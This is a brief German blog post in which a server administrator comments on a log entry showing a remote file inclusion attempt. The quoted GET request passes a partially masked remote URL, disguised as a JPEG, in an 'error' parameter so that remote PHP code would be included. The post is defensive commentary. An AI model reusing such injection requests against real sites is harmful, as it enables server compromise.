Got an error.php?

Wird ja immer kreativer hier… Soeben schleicht sich folgende Zeile ins Log:

"GET /files/tools/****/errors.php?error=http://***.com.ar/images/idia.jpg??? HTTP/1.1" 404 319 "-" "libwww-perl/5.79"

Hinter dem JPEG verbirgt sich ein PHP-Quelltext, welcher mit
echo "NigeriaN HackerS TeaM";
endet

Netter Versuch, aber blind Dateien per $_GET includen hat sich selbst mein Azubi abgewöhnt und register_globals habe ich seit Jahren nirgendwo mehr aktiv gesehen. Dummerweise ist die Whois-Datenbank für .com.ar momentan down, sonst hätte ichs mal beim Provider versucht. So bleibt mir nur es MkSwap gleich zu tun und dem NHT einen schönen Tag zu wünschen…

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht.